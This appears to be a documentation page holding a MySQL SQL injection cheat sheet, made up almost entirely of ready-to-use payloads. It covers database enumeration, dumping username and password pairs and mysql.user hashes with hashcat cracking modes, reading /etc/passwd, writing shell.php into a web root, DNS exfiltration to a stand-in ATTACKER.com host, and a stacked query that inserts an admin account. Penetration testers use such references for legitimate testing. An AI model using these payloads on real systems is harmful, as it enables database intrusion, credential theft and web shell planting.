> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Cheat Sheet — MySQL

> MySQL SQL injection cheat sheet: syntax, functions, enumeration, file access, and RCE payloads.

## Identification

```sql theme={"dark"}
SELECT @@version
SELECT version()
-- Comment: # or -- - or /* */
-- String concat: CONCAT('a','b') or 'a' 'b'
```

***

## Information Gathering

```sql theme={"dark"}
SELECT database()
SELECT user()
SELECT @@hostname
SELECT @@datadir
SELECT @@basedir
```

***

## Enumerate Databases

```sql theme={"dark"}
SELECT schema_name FROM information_schema.schemata
SELECT group_concat(schema_name) FROM information_schema.schemata
```

***

## Enumerate Tables

```sql theme={"dark"}
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='dbname'
```

### Without information\_schema (MySQL 5.6+)

```sql theme={"dark"}
SELECT table_name FROM mysql.innodb_table_stats WHERE database_name=database()
```

***

## Enumerate Columns

```sql theme={"dark"}
SELECT column_name FROM information_schema.columns WHERE table_name='users'
SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name='users' AND table_schema=database()
```

***

## Dump Data

```sql theme={"dark"}
SELECT group_concat(username,0x3a,password) FROM users
SELECT group_concat(username,':',password SEPARATOR '\n') FROM users
```

***

## String Functions

| Function                 | Description           |
| ------------------------ | --------------------- |
| `CONCAT(a,b)`            | Concatenate           |
| `CONCAT_WS(':',a,b)`     | Concat with separator |
| `GROUP_CONCAT(a)`        | Aggregate concat      |
| `SUBSTRING(str,pos,len)` | Substring             |
| `MID(str,pos,len)`       | Same as SUBSTRING     |
| `LEFT(str,n)`            | Left N chars          |
| `RIGHT(str,n)`           | Right N chars         |
| `LENGTH(str)`            | String length         |
| `ASCII(char)`            | ASCII value           |
| `ORD(char)`              | Same as ASCII         |
| `CHAR(n)`                | Char from ASCII       |
| `HEX(str)`               | Hex encode            |
| `UNHEX(hex)`             | Hex decode            |
| `REVERSE(str)`           | Reverse string        |

***

## Conditional

```sql theme={"dark"}
IF(condition, true_val, false_val)
CASE WHEN condition THEN true_val ELSE false_val END
IFNULL(expr, alt)
```

***

## Time Delay

```sql theme={"dark"}
SLEEP(5)
BENCHMARK(10000000, SHA1('test'))
```

***

## File Read

```sql theme={"dark"}
SELECT LOAD_FILE('/etc/passwd')
SELECT LOAD_FILE(0x2f6574632f706173737764)    -- Hex path
```

***

## File Write

```sql theme={"dark"}
SELECT 'data' INTO OUTFILE '/var/www/html/shell.php'
SELECT 'data' INTO DUMPFILE '/var/www/html/shell.php'
```

Check restriction:

```sql theme={"dark"}
SELECT @@secure_file_priv
```

***

## DNS Exfiltration (Windows)

```sql theme={"dark"}
SELECT LOAD_FILE(CONCAT('\\\\',database(),'.ATTACKER.com\\x'))
```

***

## Error-Based

```sql theme={"dark"}
extractvalue(1,concat(0x7e,(QUERY)))
updatexml(1,concat(0x7e,(QUERY)),1)
(SELECT 1 FROM (SELECT count(*),concat((QUERY),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
```

***

## Password Hashes

```sql theme={"dark"}
SELECT user,authentication_string FROM mysql.user        -- MySQL 5.7+
SELECT user,password FROM mysql.user                     -- MySQL 5.6-
```

Crack: `hashcat -m 300` (MySQL4) or `-m 7401` (MySQL5).

***

## Stacked Queries

Only with `mysqli_multi_query()` or PDO:

```sql theme={"dark"}
'; INSERT INTO users VALUES('hack','pass','admin');-- -
```

***

## Useful Operators

```sql theme={"dark"}
-- LIKE wildcard
SELECT * FROM users WHERE username LIKE 'adm%'

-- REGEXP
SELECT * FROM users WHERE username REGEXP '^admin'

-- IN
SELECT * FROM users WHERE id IN (1,2,3)

-- BETWEEN
SELECT * FROM users WHERE id BETWEEN 1 AND 10
```

***

## Sources

* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
* [PentestMonkey — MySQL SQL Injection Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
* [MySQL — String Functions](https://dev.mysql.com/doc/refman/8.0/en/string-functions.html)
* [OWASP — SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [PayloadsAllTheThings — MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
